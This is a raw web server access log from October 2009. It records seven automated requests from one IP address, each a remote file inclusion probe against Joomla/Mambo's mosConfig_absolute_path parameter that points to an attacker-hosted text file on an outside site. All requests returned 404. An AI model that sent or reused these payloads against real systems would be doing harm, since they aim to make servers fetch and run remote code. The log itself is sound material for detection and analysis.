222.73.17.7 - - [13/Oct/2009:02:18:29 -0400] "GET /logs/access_log.Q109061400//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:29 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:29 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:30 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:30 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:31 -0400] "GET /logs/access_log.Q109061400//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:37 -0400] "GET /logs/access_log.Q109071700%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
